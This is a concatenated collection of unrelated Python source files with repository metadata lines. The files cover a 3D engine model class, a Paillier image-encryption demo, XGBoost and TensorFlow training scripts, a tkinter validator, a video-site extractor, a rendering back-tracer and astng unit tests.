from ..physics_management.physicsModule import bodyShapesEnum
class ModelInstance(Base3DObject):
def __init__(self, baseMats, modelID, engine, ID, animationQuality, position, rotation, uniformScale,
shape=bodyShapesEnum.box, mass=None, isDynamic=False):
"""
This object is returned by Scene.AddModel and represents one transformable instance
of a non-transformable mesh loaded previously.
@type animationQuality: int
@type baseMats: list
@rtype : ModelInstance
@param baseMats: List of materials to copy
@param modelID: ID of this instance for the scene
@type engine: ManagersReferenceHolder
"""
mod = engine.models._getModel(modelID)
if not mod:
raise KeyError('Model \'{}\' not found. Try loading it first.')
mins, maxs = mod.boundingBox.getBounds()
size = [0, 0, 0]
size[0] = (abs(maxs[0]) / 2.0) + (abs(mins[0]) / 2.0)
size[1] = (abs(maxs[1]) / 2.0) + (abs(mins[1]) / 2.0)
size[2] = (abs(maxs[2]) / 2.0) + (abs(mins[2]) / 2.0)
offset = mod.boundingBox.center()
super(ModelInstance, self).__init__(position, rotation, uniformScale, size, shape, mass, isDynamic, ID, offset)
self._materials = []
self._attachedSounds = {}
for m in baseMats:
self._materials.append(Material._fromMaterial(m))
self._sounds = engine.sounds
self._models = engine.models
self._baseModelID = modelID
self.animationQuality = animationQuality
def getAnimationsList(self):
return list(self._models._getModel(self._baseModelID).animations.keys())
def attachSound(self, bufferID, onObjectID):
"""
@rtype : SoundClass.Sound
"""
sound = self._sounds.getSound(bufferID)
if sound.channelCount > 1:
raise AttributeError("Only monoaural sounds can be attached.\n"
"Sound with bufferID '{0}' is not monoaural.".format(bufferID))
sound.position = self.position
self._attachedSounds[onObjectID] = sound
return sound
def removeAttachedSound(self, ID):
if ID in self._attachedSounds:
try:
self._attachedSounds.pop(ID)
except Exception:
pass
def getAttachedSound(self, ID):
"""
@rtype : Sound
"""
if ID in self._attachedSounds.keys():
return self._attachedSounds.get(ID)
else:
raise KeyError("The ID was not found")
def getMaterialById(self, ID):
"""
@rtype : Material
"""
for tm in self._materials:
if Material(tm).ID == ID:
return tm
raise KeyError("The ID was not found")
def getMaterialByIndex(self, index):
"""
@rtype : Material
"""
return self._materials[index]
def _update(self):
if super(ModelInstance, self)._update():
for Sn in self._attachedSounds.values():
Sn.soundSource.position = list(self._position)
| 2.296875 | 2 |
main.py | sukreshmanda/paillier-image-processing | 2 | 12766805 | import numpy as np
from PIL import Image
from paillier import *
import sys
from matplotlib import pyplot as plt
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class main:
def __main__(self):
self.imagepath = None
self.c_image = None
self.image = None
self.is_image_loaded = False
self.is_encrypted = False
self.pail = paillier()
self.priv, self.pub = self.pail.generate_keypair(20)
def start(self):
pass
def nothing():
pail = paillier()
image = pail.open_image('simple.png')
priv, pub = pail.generate_keypair(20)
c_image = pail.encrypt_image(pub,image)
#c_image = pail.multiply_by_const(pub, c_image, 2)
#c_image = pail.swap_colors(pub, c_image, 'red', 'green')
#c_image = pail.flip_image(pub, c_image)
#c_image = pail.mirroring_image(pub, c_image)
#p_image = pail.increase_color(pub, c_image, "red", 100)
#c_image = pail.brightness(pub,c_image, 40)
d_image = pail.decrypt_image(priv, pub, c_image)
pail.save_image(d_image)
if __name__ == '__main__':
pail = paillier()
original = pail.open_image(sys.argv[1])
priv, pub = pail.generate_keypair(20)
c_image = pail.encrypt_image(pub, original)
print("Enter help for options..")
while(True):
a = input(bcolors.OKCYAN+"(paillier)#> "+bcolors.ENDC)
try:
inputs = a.strip().split()
if(inputs[0] == 'brightness'):
c_image = pail.brightness(pub,c_image, int(inputs[1]))
elif(inputs[0] == 'color'):
c_image = pail.increase_color(pub, c_image, inputs[1], int(inputs[2]))
elif(inputs[0] == 'mirror'):
c_image = pail.mirroring_image(pub, c_image)
elif(inputs[0] == 'flip'):
c_image = pail.flip_image(pub, c_image)
elif(inputs[0] == 'swap'):
c_image = pail.swap_colors(pub, c_image, inputs[1] , inputs[2] )
elif(inputs[0] == 'multiply'):
c_image = pail.multiply_by_const(pub, c_image, 2)
elif(inputs[0] == 'print'):
print(c_image)
elif(inputs[0] == 'show'):
fig = plt.figure(figsize=(10, 7))
fig.add_subplot(1, 2, 1)
if(len(original.shape) == 2):
plt.imshow(original, cmap='gray')
else:
plt.imshow(original)
plt.axis('off')
plt.title("Original")
result = pail.decrypt_image(priv, pub, c_image)
fig.add_subplot(1, 2, 2)
if(len(result.shape) == 2):
plt.imshow(result, cmap='gray')
else:
plt.imshow(result)
plt.axis('off')
plt.title("Result")
plt.show()
elif(inputs[0] == 'keys'):
print(bcolors.OKGREEN+"{} {}".format(pub,priv)+bcolors.ENDC)
elif(inputs[0] == 'help'):
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
else:
print("Wrong input...")
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
except:
print("Wrong input...")
print(bcolors.OKGREEN+"\tbrightness {value}\n\tcolor {color} {value}\n\tmirror\n\tflip\n\tswap {color1} {color2}\n\tmultiply {value}\n\tshow\n\tprint\n\tkeys"+bcolors.ENDC)
| 2.59375 | 3 |
xgb_train.py | 03pie/SMPCUP2017 | 25 | 12766806 | <reponame>03pie/SMPCUP2017
from collections import Counter
import pandas as pd
from sklearn import linear_model
from sklearn.linear_model import LogisticRegression
import xgboost as xgb
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.cross_validation import train_test_split
from sklearn.model_selection import StratifiedKFold
import matplotlib.pyplot as plt
import numpy as np
data_root = '/media/jyhkylin/本地磁盘1/study/数据挖掘竞赛/SMPCUP2017/'
train3 = pd.read_table(data_root+'SMPCUP2017dataset/SMPCUP2017_TrainingData_Task3.txt'
,sep='\001' ,names=['userID' ,'growthValue'])
stadata3 = pd.read_csv(data_root+'SMPCUP2017dataset/actStatisticData_new1.csv')
train3 = pd.merge(train3 ,stadata3 ,left_on='userID' ,right_on='userID' ,how='left')
x = np.array(train3.drop(['userID' ,'growthValue'] ,axis=1))
y = np.array(train3['growthValue'])
#submit
test3 = pd.read_table(data_root+'SMPCUP2017dataset/SMPCUP2017_TestSet_Task3.txt' ,
sep='\001' ,names=['userID'])
test3 = pd.merge(test3 ,stadata3 ,left_on='userID' ,right_on='userID' ,how='left')
param = {'max_depth':10,
'eta': 0.22,
'silent': 1,
'objective': 'reg:tweedie',
'booster': 'gbtree' ,
'seed':10 ,
'base_score':0.5 ,
'eval_metric':'mae' ,
'min_child_weight':1 ,
'gamma':0.007 ,
'tree_method':'hist' ,
'tweedie_variance_power':1.54 ,
'nthread':4
}
num_round = 45
dtrain = xgb.DMatrix(x,label=y)
bst = xgb.train(param, dtrain, num_round)
x_t = xgb.DMatrix(np.array(test3.drop(['userID'] ,axis=1)))
y_t = bst.predict(x_t)
task3 = pd.DataFrame([test3['userID'] ,y_t]).T
task3 = task3.rename(columns={'userID':'userid' ,'Unnamed 0':'growthvalue'})
task3.to_csv('task3_final.txt' ,index=False ,sep=',')
| 2.234375 | 2 |
tf.py | ca7869/tensorflow | 0 | 12766807 | import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python import keras
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
from tensorflow.python.keras.layers import Input, Dense
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import LeakyReLU
#from tensorflow.python.framework import ops
base_dir = '/home/anoop/Downloads/dogs-vs-cats'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
# Directory with our training cat/dog pictures
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
# Directory with our validation cat/dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
train_cat_fnames = os.listdir( train_cats_dir )
train_dog_fnames = os.listdir( train_dogs_dir )
print(train_cat_fnames[:10])
print(train_dog_fnames[:10])
print('total training cat images :', len(os.listdir( train_cats_dir ) ))
print('total training dog images :', len(os.listdir( train_dogs_dir ) ))
print('total validation cat images :', len(os.listdir( validation_cats_dir ) ))
print('total validation dog images :', len(os.listdir( validation_dogs_dir ) ))
#/* %matplotlib inline
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
pic_index = 0 # Index for iterating over images
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols*4, nrows*4)
pic_index+=8
next_cat_pix = [os.path.join(train_cats_dir, fname)
for fname in train_cat_fnames[ pic_index-8:pic_index]
]
next_dog_pix = [os.path.join(train_dogs_dir, fname)
for fname in train_dog_fnames[ pic_index-8:pic_index]
]
for i, img_path in enumerate(next_cat_pix+next_dog_pix):
# Set up subplot; subplot indices start at 1
sp = plt.subplot(nrows, ncols, i + 1)
sp.axis('Off') # Don't show axes (or gridlines)
img = mpimg.imread(img_path)
# plt.imshow(img)
#plt.show()
train_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size = (150,150),
batch_size = 20,
class_mode = 'binary'
)
model = tf.keras.models.Sequential([
# Note the input shape is the desired size of the image 150x150 with 3 bytes color
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150, 150, 3)),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
# Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('cats') and 1 for the other ('dogs')
tf.keras.layers.Dense(1, activation='sigmoid')
]) | 2.640625 | 3 |
src/intvalidate.py | vinceshores/tkvalidate | 0 | 12766808 | import tkinter as tk
def int_validate(entry_widget, from_=None, to=None):
"""
Validates an entry_widget so that only integers within a specified range may be entered
:param entry_widget: The tkinter.Entry widget to validate
:param from_: The start limit of the integer
:param to: The end limit of the integer
:return: None
"""
from_ = from_ if from_ is not None else entry_widget.configure()['from'][4]
to = to if to is not None else entry_widget.configure()['to'][4]
num_str = entry_widget.get()
current = None if (not _is_int(num_str)) else int(num_str)
check = _NumberCheck(entry_widget, from_, to, current=current)
entry_widget.config(validate='all')
entry_widget.config(validatecommand=check.vcmd)
entry_widget.bind('<FocusOut>', lambda event: _validate(entry_widget, check))
_validate(entry_widget, check)
def _is_int(num_str):
"""
Returns whether or not a given string is an integer
:param num_str: The string to test
:return: Whether or not the string is an integer
"""
try:
int(num_str)
return True
except ValueError:
return False
def _validate(entry, num_check):
"""
Validates an entry so if there is invalid text in it it will be replaced by the last valid text
:param entry: The entry widget
:param num_check: The _NumberCheck instance that keeps track of the last valid number
:return: None
"""
if not _is_int(entry.get()):
entry.delete(0, tk.END)
entry.insert(0, str(num_check.last_valid))
class _NumberCheck:
"""
Class used for validating entry widgets, self.vcmd is provided as the validatecommand
"""
def __init__(self, parent, min_, max_, current):
self.parent = parent
self.low = min_
self.high = max_
self.vcmd = parent.register(self.in_integer_range), '%d', '%P'
if _NumberCheck.in_range(0, min_, max_):
self.last_valid = 0
else:
self.last_valid = min_
if current is not None:
self.last_valid = current
def in_integer_range(self, type_, after_text):
"""
Validates an entry to make sure the correct text is being inputted
:param type_: 0 for deletion, 1 for insertion, -1 for focus in
:param after_text: The text that the entry will display if validated
:return:
"""
if type_ == '-1':
if _is_int(after_text):
self.last_valid = int(after_text)
# Delete Action, always okay, if valid number save it
elif type_ == '0':
try:
num = int(after_text)
self.last_valid = num
except ValueError:
pass
return True
# Insert Action, okay based on ranges, if valid save num
elif type_ == '1':
try:
num = int(after_text)
except ValueError:
if self.can_be_negative() and after_text == '-':
return True
return False
if self.is_valid_range(num):
self.last_valid = num
return True
return False
return False
def can_be_negative(self):
"""
Tests whether this given entry widget can have a negative number
:return: Whether or not the entry can have a negative number
"""
return (self.low is None) or (self.low < 0)
def is_valid_range(self, num):
"""
Tests whether the given number is valid for this entry widgets range
:param num: The number to range test
:return: Whether or not the number is in range
"""
return _NumberCheck.in_range(num, self.low, self.high)
@staticmethod
def in_range(num, low, high):
"""
Tests whether or not a number is within a specified range inclusive
:param num: The number to test if its in the range
:param low: The minimum of the range
:param high: The maximum of the range
:return: Whether or not the number is in the range
"""
if (low is not None) and (num < low):
return False
if (high is not None) and (num > high):
return False
return True
if __name__ == '__main__':
import tkinter as tk
from tkinter import ttk
root = tk.Tk()
widget = ttk.Spinbox(root, justify=tk.CENTER, from_=-5, to_=10)
widget.pack(padx=10, pady=10)
int_validate(widget)
root.mainloop()
| 4.09375 | 4 |
youtuatools/extractor/ciscolive.py | Pagasis/YouTua | 47 | 12766809 | <filename>youtuatools/extractor/ciscolive.py
# coding: utf-8
from __future__ import unicode_literals
import itertools
from .common import InfoExtractor
from ..compat import (
compat_parse_qs,
compat_urllib_parse_urlparse,
)
from ..utils import (
clean_html,
float_or_none,
int_or_none,
try_get,
urlencode_postdata,
)
class CiscoLiveBaseIE(InfoExtractor):
# These appear to be constant across all Cisco Live presentations
# and are not tied to any user session or event
RAINFOCUS_API_URL = "https://events.rainfocus.com/api/%s"
RAINFOCUS_API_PROFILE_ID = "Na3vqYdAlJFSxhYTYQGuMbpafMqftalz"
RAINFOCUS_WIDGET_ID = "n6l4Lo05R8fiy3RpUBm447dZN8uNWoye"
BRIGHTCOVE_URL_TEMPLATE = "http://players.brightcove.net/5647924234001/SyK2FdqjM_default/index.html?videoId=%s"
HEADERS = {
"Origin": "https://ciscolive.cisco.com",
"rfApiProfileId": RAINFOCUS_API_PROFILE_ID,
"rfWidgetId": RAINFOCUS_WIDGET_ID,
}
def _call_api(self, ep, rf_id, query, referrer, note=None):
headers = self.HEADERS.copy()
headers["Referer"] = referrer
return self._download_json(
self.RAINFOCUS_API_URL % ep,
rf_id,
note=note,
data=urlencode_postdata(query),
headers=headers,
)
def _parse_rf_item(self, rf_item):
event_name = rf_item.get("eventName")
title = rf_item["title"]
description = clean_html(rf_item.get("abstract"))
presenter_name = try_get(rf_item, lambda x: x["participants"][0]["fullName"])
bc_id = rf_item["videos"][0]["url"]
bc_url = self.BRIGHTCOVE_URL_TEMPLATE % bc_id
duration = float_or_none(try_get(rf_item, lambda x: x["times"][0]["length"]))
location = try_get(rf_item, lambda x: x["times"][0]["room"])
if duration:
duration = duration * 60
return {
"_type": "url_transparent",
"url": bc_url,
"ie_key": "BrightcoveNew",
"title": title,
"description": description,
"duration": duration,
"creator": presenter_name,
"location": location,
"series": event_name,
}
class CiscoLiveSessionIE(CiscoLiveBaseIE):
_VALID_URL = (
r"https?://(?:www\.)?ciscolive(?:\.cisco)?\.com/[^#]*#/session/(?P<id>[^/?&]+)"
)
_TESTS = [
{
"url": "https://ciscolive.cisco.com/on-demand-library/?#/session/1423353499155001FoSs",
"md5": "c98acf395ed9c9f766941c70f5352e22",
"info_dict": {
"id": "5803694304001",
"ext": "mp4",
"title": "13 Smart Automations to Monitor Your Cisco IOS Network",
"description": "md5:ec4a436019e09a918dec17714803f7cc",
"timestamp": 1530305395,
"upload_date": "20180629",
"uploader_id": "5647924234001",
"location": "16B Mezz.",
},
},
{
"url": "https://www.ciscolive.com/global/on-demand-library.html?search.event=ciscoliveemea2019#/session/15361595531500013WOU",
"only_matching": True,
},
{
"url": "https://www.ciscolive.com/global/on-demand-library.html?#/session/1490051371645001kNaS",
"only_matching": True,
},
]
def _real_extract(self, url):
rf_id = self._match_id(url)
rf_result = self._call_api("session", rf_id, {"id": rf_id}, url)
return self._parse_rf_item(rf_result["items"][0])
class CiscoLiveSearchIE(CiscoLiveBaseIE):
_VALID_URL = r"https?://(?:www\.)?ciscolive(?:\.cisco)?\.com/(?:global/)?on-demand-library(?:\.html|/)"
_TESTS = [
{
"url": "https://ciscolive.cisco.com/on-demand-library/?search.event=ciscoliveus2018&search.technicallevel=scpsSkillLevel_aintroductory&search.focus=scpsSessionFocus_designAndDeployment#/",
"info_dict": {
"title": "Search query",
},
"playlist_count": 5,
},
{
"url": "https://ciscolive.cisco.com/on-demand-library/?search.technology=scpsTechnology_applicationDevelopment&search.technology=scpsTechnology_ipv6&search.focus=scpsSessionFocus_troubleshootingTroubleshooting#/",
"only_matching": True,
},
{
"url": "https://www.ciscolive.com/global/on-demand-library.html?search.technicallevel=scpsSkillLevel_aintroductory&search.event=ciscoliveemea2019&search.technology=scpsTechnology_dataCenter&search.focus=scpsSessionFocus_bestPractices#/",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if CiscoLiveSessionIE.suitable(url)
else super(CiscoLiveSearchIE, cls).suitable(url)
)
@staticmethod
def _check_bc_id_exists(rf_item):
return (
int_or_none(try_get(rf_item, lambda x: x["videos"][0]["url"])) is not None
)
def _entries(self, query, url):
query["size"] = 50
query["from"] = 0
for page_num in itertools.count(1):
results = self._call_api(
"search", None, query, url, "Downloading search JSON page %d" % page_num
)
sl = try_get(results, lambda x: x["sectionList"][0], dict)
if sl:
results = sl
items = results.get("items")
if not items or not isinstance(items, list):
break
for item in items:
if not isinstance(item, dict):
continue
if not self._check_bc_id_exists(item):
continue
yield self._parse_rf_item(item)
size = int_or_none(results.get("size"))
if size is not None:
query["size"] = size
total = int_or_none(results.get("total"))
if total is not None and query["from"] + query["size"] > total:
break
query["from"] += query["size"]
def _real_extract(self, url):
query = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
query["type"] = "session"
return self.playlist_result(
self._entries(query, url), playlist_title="Search query"
)
| 1.953125 | 2 |
rendering/back_tracer.py | optas/geo_tool | 6 | 12766810 | '''
Created on Jul 25, 2016
@author: <NAME>
@contact: <EMAIL>
@copyright: You are free to use, change, or redistribute this code in any way
you want for non-commercial purposes.
'''
import glob
import os
import os.path as osp
from subprocess import call as sys_call
from .. in_out import soup as io
class Back_Tracer():
'''
A class providing the basic functionality for converting information
regarding 2D rendered output of Fythumb into back into thr 3D space
of the Mesh models.
'''
fythumb_bin = '/Users/optas/Documents/Eclipse_Projects/3d/thumb3d/build/thumb3d'
def __init__(self, triangle_folder, in_mesh):
'''
Constructor.
'''
self.mesh = in_mesh
self.map = Back_Tracer.generate_pixels_to_triangles_map(triangle_folder, in_mesh)
def from_2D_to_3D(self, pixels, vertex_id, twist_id):
return self.map[vertex_id, twist_id][pixels]
def is_legit_view_and_twist(self, vertex_id, twist_id):
return (vertex_id, twist_id) in self.map
@staticmethod
def render_views_of_shapes(top_dir, output_dir, regex):
io.copy_folder_structure(top_dir, output_dir)
mesh_files = io.files_in_subdirs(top_dir, regex)
if output_dir[-1] != os.sep:
output_dir += os.sep
for f in mesh_files:
out_sub_folder = f.replace(top_dir, output_dir)
mark = out_sub_folder[::-1].find('.') # Find last occurrence of '.' to remove the ending (e.g., .txt)
if mark > 0:
out_sub_folder = out_sub_folder[:-mark - 1]
Back_Tracer.fythumb_compute_views_of_shape(f, out_sub_folder)
@staticmethod
def fythumb_compute_views_of_shape(mesh_file, output_dir):
sys_call([Back_Tracer.fythumb_bin, '-i', mesh_file, '-o', output_dir, '-r'])
@staticmethod
def pixels_to_triangles(pixel_file, off_file, camera_vertex, camera_twist, output_dir, out_file_name):
sys_call([Back_Tracer.fythumb_bin, '-i', off_file, '-s', pixel_file, '-o', output_dir,
'-v', camera_vertex, '-t', camera_twist, '-f', out_file_name])
@staticmethod
def compute_triangles_from_pixels(off_file, pixels_folder, output_folder):
searh_pattern = osp.join(pixels_folder, '*.txt')
c = 0
for pixel_file in glob.glob(searh_pattern):
camera_vertex, camera_twist = io.name_to_cam_position(pixel_file, cam_delim='_')
out_file_name = '%d_%d.txt' % (camera_vertex, camera_twist)
print 'Computing Triangles for %s file.' % (pixel_file)
Back_Tracer.pixels_to_triangles(pixel_file, off_file, str(camera_vertex), str(camera_twist), output_folder, out_file_name)
c += 1
print 'Computed the triangles for %d files.' % (c)
@staticmethod
def generate_pixels_to_triangles_map(triangle_folder, in_mesh):
searh_pattern = osp.join(triangle_folder, '*.txt')
inv_dict = in_mesh.inverse_triangle_dictionary()
res = dict()
for triangle_file in glob.glob(searh_pattern):
camera_vertex, camera_twist = io.name_to_cam_position(triangle_file, cam_delim='_')
res[(camera_vertex, camera_twist)] = dict()
pixels, triangles, _ = io.read_triangle_file(triangle_file)
triangles = map(tuple, triangles)
triangles = [inv_dict[tr] for tr in triangles]
pixels = map(tuple, pixels)
res[(camera_vertex, camera_twist)] = {key: val for key, val in zip(pixels, triangles)}
return res
if __name__ == '__main__':
from geo_tool.solids.mesh import Mesh
in_mesh = Mesh('../Data/Screw/screw.off')
bt = Back_Tracer('../Data/Screw/Salient_Triangles', in_mesh)
print bt
| 2.1875 | 2 |
vendor/packages/logilab-astng/test/unittest_scoped_nodes.py | jgmize/kitsune | 2 | 12766811 | <reponame>jgmize/kitsune
# copyright 2003-2010 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:<EMAIL>
# copyright 2003-2010 <NAME>, all rights reserved.
# contact mailto:<EMAIL>
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
"""tests for specific behaviour of astng scoped nodes (i.e. module, class and
function)
"""
import sys
from os.path import join, abspath
from logilab.common.testlib import TestCase, unittest_main
from logilab.common.compat import sorted
from logilab.astng import builder, nodes, scoped_nodes, \
InferenceError, NotFoundError
from logilab.astng.bases import Instance, BoundMethod, UnboundMethod
abuilder = builder.ASTNGBuilder()
MODULE = abuilder.file_build('data/module.py', 'data.module')
MODULE2 = abuilder.file_build('data/module2.py', 'data.module2')
NONREGR = abuilder.file_build('data/nonregr.py', 'data.nonregr')
PACK = abuilder.file_build('data/__init__.py', 'data')
def _test_dict_interface(self, node, test_attr):
self.assert_(node[test_attr] is node[test_attr])
self.assert_(test_attr in node)
node.keys()
node.values()
node.items()
iter(node)
class ModuleNodeTC(TestCase):
def test_special_attributes(self):
self.assertEquals(len(MODULE.getattr('__name__')), 1)
self.assertIsInstance(MODULE.getattr('__name__')[0], nodes.Const)
self.assertEquals(MODULE.getattr('__name__')[0].value, 'data.module')
self.assertEquals(len(MODULE.getattr('__doc__')), 1)
self.assertIsInstance(MODULE.getattr('__doc__')[0], nodes.Const)
self.assertEquals(MODULE.getattr('__doc__')[0].value, 'test module for astng\n')
self.assertEquals(len(MODULE.getattr('__file__')), 1)
self.assertIsInstance(MODULE.getattr('__file__')[0], nodes.Const)
self.assertEquals(MODULE.getattr('__file__')[0].value, abspath(join('data', 'module.py')))
self.assertEquals(len(MODULE.getattr('__dict__')), 1)
self.assertIsInstance(MODULE.getattr('__dict__')[0], nodes.Dict)
self.assertRaises(NotFoundError, MODULE.getattr, '__path__')
self.assertEquals(len(PACK.getattr('__path__')), 1)
self.assertIsInstance(PACK.getattr('__path__')[0], nodes.List)
def test_dict_interface(self):
_test_dict_interface(self, MODULE, 'YO')
def test_getattr(self):
yo = MODULE.getattr('YO')[0]
self.assertIsInstance(yo, nodes.Class)
self.assertEquals(yo.name, 'YO')
red = MODULE.igetattr('redirect').next()
self.assertIsInstance(red, nodes.Function)
self.assertEquals(red.name, 'nested_args')
spawn = MODULE.igetattr('spawn').next()
self.assertIsInstance(spawn, nodes.Class)
self.assertEquals(spawn.name, 'Execute')
# resolve packageredirection
sys.path.insert(1, 'data')
try:
m = abuilder.file_build('data/appl/myConnection.py', 'appl.myConnection')
cnx = m.igetattr('SSL1').next().igetattr('Connection').next()
self.assertEquals(cnx.__class__, nodes.Class)
self.assertEquals(cnx.name, 'Connection')
self.assertEquals(cnx.root().name, 'SSL1.Connection1')
finally:
del sys.path[1]
self.assertEquals(len(NONREGR.getattr('enumerate')), 2)
# raise ResolveError
self.assertRaises(InferenceError, MODULE.igetattr, 'YOAA')
def test_wildard_import_names(self):
m = abuilder.file_build('data/all.py', 'all')
self.assertEquals(m.wildcard_import_names(), ['Aaa', '_bla', 'name'])
m = abuilder.file_build('data/notall.py', 'notall')
res = m.wildcard_import_names()
res.sort()
self.assertEquals(res, ['Aaa', 'func', 'name', 'other'])
def test_module_getattr(self):
data = '''
appli = application
appli += 2
del appli
'''
astng = abuilder.string_build(data, __name__, __file__)
# test del statement not returned by getattr
self.assertEquals(len(astng.getattr('appli')), 2,
astng.getattr('appli'))
class FunctionNodeTC(TestCase):
def test_special_attributes(self):
func = MODULE2['make_class']
self.assertEquals(len(func.getattr('__name__')), 1)
self.assertIsInstance(func.getattr('__name__')[0], nodes.Const)
self.assertEquals(func.getattr('__name__')[0].value, 'make_class')
self.assertEquals(len(func.getattr('__doc__')), 1)
self.assertIsInstance(func.getattr('__doc__')[0], nodes.Const)
self.assertEquals(func.getattr('__doc__')[0].value, 'check base is correctly resolved to Concrete0')
self.assertEquals(len(MODULE.getattr('__dict__')), 1)
self.assertIsInstance(MODULE.getattr('__dict__')[0], nodes.Dict)
def test_dict_interface(self):
_test_dict_interface(self, MODULE['global_access'], 'local')
def test_default_value(self):
func = MODULE2['make_class']
self.assertIsInstance(func.args.default_value('base'), nodes.Getattr)
self.assertRaises(scoped_nodes.NoDefault, func.args.default_value, 'args')
self.assertRaises(scoped_nodes.NoDefault, func.args.default_value, 'kwargs')
self.assertRaises(scoped_nodes.NoDefault, func.args.default_value, 'any')
#self.assertIsInstance(func.mularg_class('args'), nodes.Tuple)
#self.assertIsInstance(func.mularg_class('kwargs'), nodes.Dict)
#self.assertEquals(func.mularg_class('base'), None)
def test_navigation(self):
function = MODULE['global_access']
self.assertEquals(function.statement(), function)
l_sibling = function.previous_sibling()
# check taking parent if child is not a stmt
self.assertIsInstance(l_sibling, nodes.Assign)
child = function.args.args[0]
self.assert_(l_sibling is child.previous_sibling())
r_sibling = function.next_sibling()
self.assertIsInstance(r_sibling, nodes.Class)
self.assertEquals(r_sibling.name, 'YO')
self.assert_(r_sibling is child.next_sibling())
last = r_sibling.next_sibling().next_sibling().next_sibling()
self.assertIsInstance(last, nodes.Assign)
self.assertEquals(last.next_sibling(), None)
first = l_sibling.previous_sibling().previous_sibling().previous_sibling().previous_sibling().previous_sibling()
self.assertEquals(first.previous_sibling(), None)
def test_nested_args(self):
func = MODULE['nested_args']
#self.assertEquals(func.args.args, ['a', ('b', 'c', 'd')])
local = func.keys()
local.sort()
self.assertEquals(local, ['a', 'b', 'c', 'd'])
self.assertEquals(func.type, 'function')
def test_format_args(self):
func = MODULE2['make_class']
self.assertEquals(func.args.format_args(), 'any, base=data.module.YO, *args, **kwargs')
func = MODULE['nested_args']
self.assertEquals(func.args.format_args(), 'a, (b, c, d)')
def test_is_abstract(self):
method = MODULE2['AbstractClass']['to_override']
self.assert_(method.is_abstract(pass_is_abstract=False))
self.failUnlessEqual(method.qname(), 'data.module2.AbstractClass.to_override')
self.failUnlessEqual(method.pytype(), '__builtin__.instancemethod')
method = MODULE2['AbstractClass']['return_something']
self.assert_(not method.is_abstract(pass_is_abstract=False))
# non regression : test raise "string" doesn't cause an exception in is_abstract
func = MODULE2['raise_string']
self.assert_(not func.is_abstract(pass_is_abstract=False))
## def test_raises(self):
## method = MODULE2['AbstractClass']['to_override']
## self.assertEquals([str(term) for term in method.raises()],
## ["CallFunc(Name('NotImplementedError'), [], None, None)"] )
## def test_returns(self):
## method = MODULE2['AbstractClass']['return_something']
## # use string comp since Node doesn't handle __cmp__
## self.assertEquals([str(term) for term in method.returns()],
## ["Const('toto')", "Const(None)"])
def test_lambda_pytype(self):
data = '''
def f():
g = lambda: None
'''
astng = abuilder.string_build(data, __name__, __file__)
g = list(astng['f'].ilookup('g'))[0]
self.failUnlessEqual(g.pytype(), '__builtin__.function')
def test_is_method(self):
if sys.version_info < (2, 4):
self.skip('this test require python >= 2.4')
data = '''
class A:
def meth1(self):
return 1
@classmethod
def meth2(cls):
return 2
@staticmethod
def meth3():
return 3
def function():
return 0
@staticmethod
def sfunction():
return -1
'''
astng = abuilder.string_build(data, __name__, __file__)
self.failUnless(astng['A']['meth1'].is_method())
self.failUnless(astng['A']['meth2'].is_method())
self.failUnless(astng['A']['meth3'].is_method())
self.failIf(astng['function'].is_method())
self.failIf(astng['sfunction'].is_method())
def test_argnames(self):
code = 'def f(a, (b, c), *args, **kwargs): pass'
astng = abuilder.string_build(code, __name__, __file__)
self.assertEquals(astng['f'].argnames(), ['a', 'b', 'c', 'args', 'kwargs'])
class ClassNodeTC(TestCase):
def test_dict_interface(self):
_test_dict_interface(self, MODULE['YOUPI'], 'method')
def test_cls_special_attributes_1(self):
cls = MODULE['YO']
self.assertEquals(len(cls.getattr('__bases__')), 1)
self.assertEquals(len(cls.getattr('__name__')), 1)
